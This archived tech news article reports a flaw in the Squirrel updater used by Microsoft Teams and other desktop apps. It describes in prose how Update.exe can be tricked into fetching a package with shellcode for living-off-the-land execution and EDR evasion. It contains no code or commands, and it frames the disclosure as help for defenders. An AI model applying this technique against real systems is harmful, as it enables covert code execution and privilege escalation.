Sign up for our newsletter
Technology / Cybersecurity

Squirrel Exploit Leaves Microsoft Teams Vulnerable to Privilege Escalation

Microsoft’s collaboration platform Teams has a vulnerability that allows any user to insert malicious code into the application; gifting control while escalating privileges.

Researchers have found that the Microsoft Teams vulnerability can be manipulated by executing an update command in the desktop version of the application.

(Microsoft Teams is a collection of enterprise collaboration tools, comprising Office 365, a SharePoint Online site and a document library to store team files.)

This issue also affects the desktop versions of WhatsApp, UiPath and GIthub, however in their case the vulnerability can only be used to download a payload.

White papers from our partners

All of these applications use the open source project, Squirrel, which is used to oversee the installation and updating of routines, while the NuGet package manager is used to administer files.

The issue has yet to be patched: a security researcher who disclosed the issue to Microsoft, Reegun Richard, was planning to hold off publishing until it was patched, but with two other security researchers having also identified and published exploits, he said he was detailing the issue to help blue teamers.

Richard discovered that he could execute malicious code from Microsoft’s legitimate binary, making this a living off the land attack.

To do this required no special privileges and if the application has control of systems files the access and privileges can be escalated with ease.

Microsoft Teams Vulnerability

Using the vulnerability any threat actor can trick the update function of the application into downloading any malicious code they wish using Microsoft’s own binary code.

Essentially the attack involves extracting any nupkg package into which a hacker would insert a shellcode labelled as ‘squirrel.exe’.

Once a threat actor has created a suitable package they can go into the target application folder and executing the command update.exe, the application will automatically update and download to the malicious package containing the shellcode to the ‘packages’ folder.

Richard wrote in a security blog update on the vulnerability that: “I decided finally to make it public since I spent most of the time in this and without fixing this, the adversaries/insiders likely use this technique for EDR/IDS evasion, So this post will make the blueteam-defense team aware of this situation.”

Microsoft has been contacted for comment.

See Also: Malicious Code – What It Is, Why it Matters, and How to Reduce the Risk


This article is from the CBROnline archive: some formatting and images may not be present.

CBR Staff Writer

CBR Online legacy content.